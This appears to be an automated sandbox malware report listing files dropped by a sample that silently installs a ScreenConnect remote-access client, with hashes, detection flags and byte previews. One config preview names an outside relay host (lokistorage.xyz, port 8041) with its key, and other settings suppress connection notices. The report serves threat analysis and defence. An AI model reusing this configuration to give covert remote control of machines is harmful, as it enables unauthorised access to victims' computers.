Size (bytes):	598816
Entropy (8bit):	6.182826342545805
Encrypted:	false
SSDEEP:	6144:0ya9pDzjhf+YMojz3cZRzyyUs0Ny2rOfQyEAlVw72191BVi1NnfEQcYF2/R4IrNC:jajDzNZFjLcZRzyyh5/EA3wv1lSYGXk
MD5:	AB5FA8D90645878D587F386D0E276C02
SHA1:	A602A20735A1104851F293965F1FE4AB678BF627
SHA-256:	316BBF433F1F803D113ADF060C528CCC636656CEE26B90F5FEA011C1C73C7D16
SHA-512:	A181E23C8FA01BC1D9F0F9F95A5CA6112E2B61F34F4C1DA696D3CCABBBD942BCC81A3F4A60921328A6020D28AED8711C22BE33761CB685921D50FEA8B1D7B986
Malicious:	true
Yara Hits:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]..........."...0.............".... ... ....@.. .......................`......0.....@.....................................O.... .................. )...@......$...8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......LC..X.............................................................{D.....{E...V.(F.....}D.....}E......0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...... }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N.....{O.....{P...V.(F.....}O.....}P....0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...... 1.c. )UU.

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe.config

Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	true
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	842248
Entropy (8bit):	6.268561504485627
Encrypted:	false
SSDEEP:	12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
MD5:	BE74AB7A848A2450A06DE33D3026F59E
SHA1:	21568DCB44DF019F9FAF049D6676A829323C601E
SHA-256:	7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
SHA-512:	2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..\|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...\|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...\|..............@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	81696
Entropy (8bit):	5.861320173003981
Encrypted:	false
SSDEEP:	1536:QtyCl44uzbexI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7AB7gxv:78BxukLdEBY
MD5:	2C158A30F7274E1931860E434DE808A2
SHA1:	F649A56C9A598117D68CC6999627A937305DB6C7
SHA-256:	B623E67BEA356C1793F3C921C5838719ED8B879EFCD966E97EE753498B1618B5
SHA-512:	14BD481BF183CACAE210EB06AFF04870C6D53D3E7F095EA7F96A7EA227167E6A38EB20C9EDE9F36BF23D02C36182A463239B3A835D0BD28E8666C378F76FE64D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)............"...0..@...........^... ...`....@.. .......................`...... .....@..................................^..O....`.................. )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....^.(.......;...%...}....:.(......}....:.(......}....:.(......}........0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(........(+...o,...(-...t....

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe.config

Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\app.config

Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2268
Entropy (8bit):	4.7228220006400745
Encrypted:	false
SSDEEP:	48:35iMs86h/dHH/dHS/dHmh/dHfh/dH8h/dHjdH6dH85AfdH55AfdHKdH/dHAdHYOk:0OeHVHeHyHzHAHZHUH82H52HkH1HyHDC
MD5:	095C85ACC658F0733BC6941163EC234C
SHA1:	298C53608E02CAC620702CB6ABE75C70560C03B1
SHA-256:	8E3DC9D06B282A536E1AF7806D7F434D5738D4932DAE557CCD762BFEED0BFC11
SHA-512:	FE3FBE2BCD2BAABCF192663DD7603CCE1DB1025A9D40AD98598D5441D892EFC0C94AA41FE61256762538E0ED3BCC3E7958CDBF87C2D577EE3BDD561597635D03
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.SystemSettings" type="System.Configuration.ClientSettingsSection" />.. <section name="ScreenConnect.UserInterfaceSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.SystemSettings />.. <ScreenConnect.UserInterfaceSettings>.. <setting name="ShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConne

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\system.config

Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (447), with CRLF line terminators
Category:	dropped
Size (bytes):	937
Entropy (8bit):	5.785690574308825
Encrypted:	false
SSDEEP:	24:2dL9hK6E4dl/SKGumeV858KnTqKoIgmCeKMG3vH:chh7HHSomeV8LnuKoHmCeKT3v
MD5:	5E233AF4F36C85FA9CA6A643F8CEA130
SHA1:	9F64A3CFB01BBFE02C4511F0AF9856FA2DA89452
SHA-256:	317F6ACC9CF9A2DAD21874D0F439C6B6DE3C14BA875FAA525B24CA5DBC74C91D
SHA-512:	4CD32CD0243BEA0CA3C45544D65F4DBA0DBEDB79E09C4A8211AF0568E2F6C7EFE77B5D2C7EA21C7EB94FF1863D426EBA850055819F294DF1C1D0C4D311C036D7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=lokistorage.xyz&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\H36NgltNe7.exe.log

Process:	C:\Users\user\Desktop\H36NgltNe7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.36509199858051
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
MD5:	1CF2352B684EF57925D98E766BA897F2
SHA1:	6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
SHA-256:	43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
SHA-512:	9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	746
Entropy (8bit):	5.349174276064173
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
MD5:	ED994980CB1AABB953B2C8ECDC745E1F
SHA1:	9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
SHA-256:	D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
SHA-512:	61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
Category:	dropped
Size (bytes):	1110630
Entropy (8bit):	7.800118817272725
Encrypted:	false
SSDEEP:	24576:QUUGGVA5kuQ7Ye80NncfI59+5lwXoTl2cx:jGVyk7cer5IIvXobx
MD5:	845B0569D54305E62C6E8FFE198D217C
SHA1:	CD06C3D1554FE08099ADA4F4448A23A6422E6234
SHA-256:	4DA6C507C746CD07CA4546E723D0D145BBF4D26FF8DE13F1A0750EF323A89A2E
SHA-512:	AF45BB8199F2AF323B9954DA0D11EED51459708608D356BC40BD9D9189C02C2C902F533077724DD7C6A7068E564B5C8F621EF1032098CEF26ED26D5BF26E23FE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..\|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\CustomAction.config

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	228
Entropy (8bit):	5.069688959232011
Encrypted:	false
SSDEEP:	6:JiMVBdTMkI002VymRMT4/0xko57VrzW57VNQeuAW4QIT:MMHd41p2VymhsbOF93xT
MD5:	EB99EE012EB63C162EEBC1DF3A15990B
SHA1:	D48FD3B3B942C754E3588D91920670C087FCE7E9
SHA-256:	C5045C2D482F71215877EB668264EE47E1415792457F19A5A55651C3554CC7CD
SHA-512:	455EC01953EC27186FBEAD17C503B7F952474A80B41E986494697497ECEAB130AD81A5561373D6762B71EEC473D8E37CDE742F557E50233F7EB0E8FB8B0BE4AD
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8" ?>..<configuration>...<startup useLegacyV2RuntimeActivationPolicy="true">....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>..</configuration>

C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.Compression.Cab.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	4.62694170304723
Encrypted:	false
SSDEEP:	768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
MD5:	77BE59B3DDEF06F08CAA53F0911608A5
SHA1:	A3B20667C714E88CC11E845975CD6A3D6410E700
SHA-256:	9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
SHA-512:	C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.Compression.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	4.340550904466943
Encrypted:	false
SSDEEP:	384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
MD5:	4717BCC62EB45D12FFBED3A35BA20E25
SHA1:	DA6324A2965C93B70FC9783A44F869A934A9CAF7
SHA-256:	E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
SHA-512:	BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	4.657268358041957
Encrypted:	false
SSDEEP:	768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
MD5:	A921A2B83B98F02D003D9139FA6BA3D8
SHA1:	33D67E11AD96F148FD1BFD4497B4A764D6365867
SHA-256:	548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
SHA-512:	E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.WindowsInstaller.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	176128
Entropy (8bit):	5.775360792482692
Encrypted:	false
SSDEEP:	3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
MD5:	5EF88919012E4A3D8A1E2955DC8C8D81
SHA1:	C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
SHA-256:	3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
SHA-512:	4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!\|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.Core.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	546304
Entropy (8bit):	6.03286879586464
Encrypted:	false
SSDEEP:	6144:hAUz5UEsIXxk3QCLKSkGEexE77VcYbUinCLrDfElYzMsdqe1J6tMznSAiOUfw8qg:hK67tEshnkDfyt9MznZd8PTIP8
MD5:	3B1BA4BEBEFDC8A95B0F2F0B4E50C527
SHA1:	15551D2E8BFB829F3A96D161B43DE820C0D417CE
SHA-256:	A843B3A4549C43EF5BD8470CACF5D2F0F3B3C8110441FCC10079FACC7DB3DE29
SHA-512:	F41595586CD5330537F5F02B392310B028E36F618E2583D125430ECD103EBBF6D2CF6BEFCFB1B32279EEB9FD7EF018F49131E3906FB61BC324DA85D93A9A18C7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..N...........i... ........... ....................................@..................................h..O.......t...........................<h..8............................................ ............... ..H............text...@M... ...N.................. ..`.rsrc...t............P..............@..@.reloc...............T..............@..B.................i......H........@...&...................g........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.InstallerActions.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.19884453207748
Encrypted:	false
SSDEEP:	384:SBHH+yElQjHVPioy4cDphaC/GeXczrMRbx1kjvdNU5yYoJ37dbr9DO:hrCtPcDCyXcMJ5yp7dbtO
MD5:	9260AFE4BBDE2549FC0B92F657C2E50A
SHA1:	5580778A62B06D7B56D3F788727514551DE31647
SHA-256:	588D3A5E1B91D3756F74EA61C9C1B5F7871AF924FAB469CEBB579F8AEB2FC135
SHA-512:	AFCE644EE04813E1E323B719E8AD3CFEFE6E20AD0AA821F1325B8E0AE0144A7CFF4E0F1F4B6F45DF33F060392F94BCFD88D62B2218FD0BC573D65A20D80E968B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....zJ..........." ..0..N.........."m... ........... ....................................@..................................l..O................................... l..8............................................ ............... ..H............text...(M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................m......H........2...9...................k........................................(....^.(......./...%...}....:.(......}....:.(......}....:.(......}........0..h.......s#......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~......"...s....%......(...+%-.&+.(.......$...s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(......{....s .....-..o!.......{....r}..p.o

C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.Windows.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721344
Entropy (8bit):	6.638160977312247
Encrypted:	false
SSDEEP:	24576:jQNtbLFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTs5:jebLJkGYYpT0+TFiH7efP
MD5:	D196174CF03F86C8776E717F07D5D19F
SHA1:	BBD2C6A59229B3E4EC7C5742248F3F55A61DD216
SHA-256:	A1EDD67A131505CC84D76601474C53874A56B5437B835838E4A866E20F6CD264
SHA-512:	CF4D159BCB42A1A7EA03F8877736CACE109AE79998906B9178C74F7A9B63030CDDC2BC94EF6C5F718E99C2D0039CF3589F8C4F2BF5B67DB94B3B96D2C988B45B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A............" ..0..<..........Z[... ...`....... ....................................@..................................[..O....`..\|...........................dZ..8............................................ ............... ..H............text...h;... ...<.................. ..`.rsrc...\|....`.......>..............@..@.reloc...............B..............@..B................;[......H.......,...................0....Y........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\TransformAppConfigXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5358
Entropy (8bit):	5.152842845836485
Encrypted:	false
SSDEEP:	48:6al5t7Bh14CGwFTwGqwFdwwA14XFUjF4OSMS5+ZL+FKwsiMS6g/VMS5JtD9FmoG6:6dQmN6MSzOE9FEFWFqFWcNH0eSYIZj
MD5:	8BD7F5FAA7C10C7BD3DADF217622D3C5
SHA1:	DEDA0F0C8521A9D6F94F76C528249504E0EE1FB9
SHA-256:	378CA2D1E4663403C3C43F1A4928821D9E6CF10BE535C084A23FF5B54C3B72DD
SHA-512:	0681765200BD3E5DFA81C0F2BBD156CFA70B91433DDA02F1DB0F440CB697E6399C3177B821CE62535003E9E3849D5B695E4DCAB6593CAFC70E673EEF99D2ACB5
Malicious:	false
Preview:	<xsl:stylesheet version="2.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform" ...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...exclude-result-prefixes="msxsl"..>...<xsl:output method="xml" omit-xml-declaration="yes"/>...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@"/>....</xsl:copy>...</xsl:template>.....<xsl:variable name="EnableGuestRequireConsentToggle" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='EnableGuestRequireConsentToggle']" />...<xsl:variable name="SupportLockMachineOnDisconnect" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='SupportLockMachineOnDisconnect']" />...<xsl:variable name="AccessLockMachineOnDisconnect" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='AccessLockMachineOnDisconnect']" />...<xsl:variable name="SupportLockMachine

C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\TransformClientOverrideResx.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1135
Entropy (8bit):	5.055198370362517
Encrypted:	false
SSDEEP:	24:3qae8NW+OOt69ta9DAa9DtPMwrDAiFGrZs1BEU/q5rM/+01j:3qae8NW6SubtzAiFGrZC+IYrRqj
MD5:	7F75CED83D8C263A88A622A1E089B902
SHA1:	4C14858C78B556A0D1A02D596F74059944AE7865
SHA-256:	115937C6A57BFC17E1F9EA92C0C146DB44C803A449207FC77DD53CB0824DAA29
SHA-512:	C813C1D990DDAFE9B1A441791870A7238673E9CBA25CC044A6679EC2707323E3B91AEC6DE7CC14E434297B10DC33987D3C1FD7FDB2F742370F272C80FC01DA4C
Malicious:	false
